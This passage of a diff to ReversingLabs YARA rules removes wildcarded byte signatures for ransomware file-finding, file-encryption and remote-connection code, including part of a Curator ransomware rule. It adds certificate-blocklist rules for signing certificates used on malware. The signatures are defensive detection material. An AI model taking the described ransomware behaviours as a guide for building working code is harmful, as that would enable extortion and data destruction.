-            ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0
-            8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? 83 7D ?? ?? 8D
-            8D ?? ?? ?? ?? FF 75 ?? 0F 43 55 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B
-            40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ??
-            8B 5D ?? 8D 55 ?? 53 FF B5 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 8B 85 ??
-            ?? ?? ?? 8B 40 ?? 85 FF 0F 85 ?? ?? ?? ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ??
-            8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51
-            ?? 0F 1F 80 ?? ?? ?? ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 51 50 8D 4D
-        }
-		$find_files_p4 = {
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ??
-            ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B FC 0F 43 45 ?? C7
-            07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 DB 74 ?? 6A ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D ?? ?? ?? ?? 89
-            47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 83 7D ?? ?? 8B FC 0F
-            43 4D ?? 03 C1 C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ??
-            85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D
-            8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ??
-            8B FC 0F 43 45 ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D
-            ?? 85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ??
-            8D 8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45
-        }
-		$find_files_p5 = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 55 ?? 83 7D ?? ?? 8B 4D ?? 0F 43 55 ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 83 F9 ??
-            72 ?? 49 83 C8 ?? 3B C8 89 4D ?? 0F 42 C1 03 C2 0F 1F 40 ?? 80 38 ?? 75 ?? 0F B6 08
-            80 F9 ?? 75 ?? 33 C9 EB ?? 1B C9 83 C9 ?? 85 C9 74 ?? 3B C2 74 ?? 48 EB ?? 2B C2 EB
-            ?? 83 C8 ?? 6A ?? 8D 78 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C6 45 ?? ??
-            8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? 3B C7 0F 82 ?? ?? ?? ?? 2B C7 C7 45 ?? ?? ?? ?? ?? 83 C9 ?? 89 45 ?? 83 F8 ??
-            0F 42 C8 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 51 03 C7 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 8D ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-        }
-		$find_files_p6 = {
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B FC 0F 43 45 ?? C7 07
-            ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 DB 74 ?? 6A ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D ?? ?? ?? ?? 89 47
-            ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 83 7D ?? ?? 8B FC 0F 43
-            4D ?? 03 C1 C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85
-            DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D
-            ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B
-            FC 0F 43 45 ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ??
-            85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D
-            8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            33 FF 66 66 0F 1F 84 00 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF B7 ?? ?? ?? ?? 0F 43 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ??
-            ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 C7 ?? 83 FF
-            ?? 72 ?? 8B 5D ?? 85 DB 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? ??
-            ?? 8B 7E ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8
-        }
-		$find_files_p7 = {
-            74 ?? 8B 01 85 C0 74 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01
-            EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB ??
-            50 8B CE E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 8B 7E ?? 8D 8D
-            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 ?? 8B 01 85 C0
-            74 ?? 66 0F 1F 44 00 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01
-            EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB ??
-            50 8B CE E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 8D ?? ?? ?? ?? ?? 8B D8 8B 7D ?? 85 FF 74 ?? 8B 3F 8B CB E8 ?? ?? ?? ?? 3B
-        }
-		$find_files_p8 = {
-            C7 74 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? CC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 43 ?? 3B 45 ?? 74 ?? 8D 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? EB ?? 32 DB 8B 85 ??
-            ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 84 DB 0F
-            84 ?? ?? ?? ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 0F 84 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ??
-            8B 7E ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74
-            ?? 8B 01 85 C0 74 ?? 90 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01
-            EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? E9 ??
-            ?? ?? ?? 83 FB ?? 0F 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 8B D8 8B 7D ?? 85 FF 74 ?? 8B 3F 8B CB E8 ??
-            ?? ?? ?? 3B C7 74 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? CC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 43 ?? 3B 45 ?? 75 ?? 8D
-        }
-		$find_files_p9 = {
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? EB ?? 32
-            DB 8B 85 ?? ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ??
-            C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? C6 45 ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 0F 84 ??
-            ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B 7E ?? 8D 4D ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ??
-            F7 D9 1B C9 23 C8 74 ?? 8B 01 85 C0 74 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B
-            01 8B 40 ?? 89 01 EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 46 ??
-            ?? E9 ?? ?? ?? ?? 83 FB ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ??
-            ?? ?? 8B 7E ?? 8D 4D ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 ??
-            8B 01 85 C0 74 ?? 66 0F 1F 44 00 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B
-        }
-		$find_files_p10 = {
-            40 ?? 89 01 EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB
-            ?? 50 8B CE E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ??
-            ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ??
-            75 ?? 33 FF 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F
-            5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B
-            48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8
-        }
-		$encrypt_files_p1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 55 8B 6C 24 ?? 56 8B
-            74 24 ?? 57 8B 7C 24 ?? 85 F6 0F 8E ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 57 E8 ?? ?? ?? ??
-            83 C4 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 57 E8
-            ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 85 C0 75 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ??
-            ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 8B 4C 24 ?? 8B C1
-            83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ??
-            83 C4 ?? 85 C0 75 ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? A1 ?? ?? ?? ?? 85 C0 75
-        }
-		$encrypt_files_p2 = {
-            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 33 C9
-            85 F6 7E ?? 8D 56 ?? 53 8B 5C 24 ?? 03 D7 66 0F 1F 44 00 ?? 8A 04 19 8D 52 ?? 41 88
-            42 ?? 3B CE 7C ?? 5B 8D 44 24 ?? 89 74 24 ?? 50 8B 44 24 ?? 57 6A ?? 6A ?? 6A ?? FF
-            70 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ??
-            ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 44
-            24 ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? FF 74 24 ?? 57 E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC
-            E8 ?? ?? ?? ?? 83 C4 ?? C3 8B 74 24 ?? 56 57 55 E8 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 8B C6 5F 5E 5D
-            33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3
-        }
-		$remote_connection_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? E8 ??
-            ?? ?? ?? FF 35 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8B D8 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83
-            C4 ?? 49 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? 83 3D ?? ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 89 41 ?? 8B F2 A1 ?? ?? ?? ?? 89
-            41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 8A 02 42 84 C0 75 ?? 8D BD ??
-            ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4
-            8D 8D ?? ?? ?? ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            8B F2 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 66 90 8A 02 42 84
-            C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B
-            CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 0F 1F 00 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 8B F3 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 8A 03 43
-            84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B DE 4F 8A 47 ?? 47 84 C0 75 ?? 8B CB C1 E9 ?? F3 A5
-            8B CB 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 8B F2 89 01 A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 0F
-        }
-		$remote_connection_p2 = {
-            1F 44 00 ?? 8A 02 42 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ??
-            8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 0F 1F 00 8A 41 ?? 8D
-            49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
-            ?? A0 ?? ?? ?? ?? 6A ?? 88 41 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C7 45
-            ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 51 ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ??
-            ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B D8 85
-            DB 74 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6
-            74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 56
-            FF 15 ?? ?? ?? ?? 56 FF D7 53 FF D7 FF B5 ?? ?? ?? ?? FF D7 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B
-            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Kodemika" and pe.signatures [ i ] . serial == "43:5a:bf:46:05:3a:0a:44:5c:54:21:7a:8c:23:3a:7f" and 1616976000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Curator : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_B2F9C693A2E6634565F63C79B01Dd8F8 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Curator ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "401f1d64-afd9-55b1-8e87-b808d4679e9a"
-		date = "2021-04-22"
-		modified = "2021-04-22"
+		id = "c094666a-0bb3-5cb6-82a8-3074b9eed32b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.Curator.yara#L1-L94"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8bd29195cea0f1194e27c48ed07c52100abb7dd3de2ef7f51a645d32c3527eb3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11992-L12010"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f5ec67c082be21a2495ef90fd0a6d4fc4b1379c4903dcc051d39cf1913d5cf20"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Curator"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? ?? 33 D2 FF 15 ?? ?? ??
-            ?? 48 8B BD ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 48 8B 0D ??
-            ?? ?? ?? 41 8B DC 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 7E ?? 45 33 F6 48 8B
-            05 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 41 0F BE 8C 06 ?? ?? ?? ?? 45 0F
-            BE 8C 06 ?? ?? ?? ?? 89 4C 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 48 8D 8D
-            ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 8B CB 4D 8D 76 ?? FF C3 41 83 C4 ?? 88 84 0D
-            ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 44 3B E0 7C
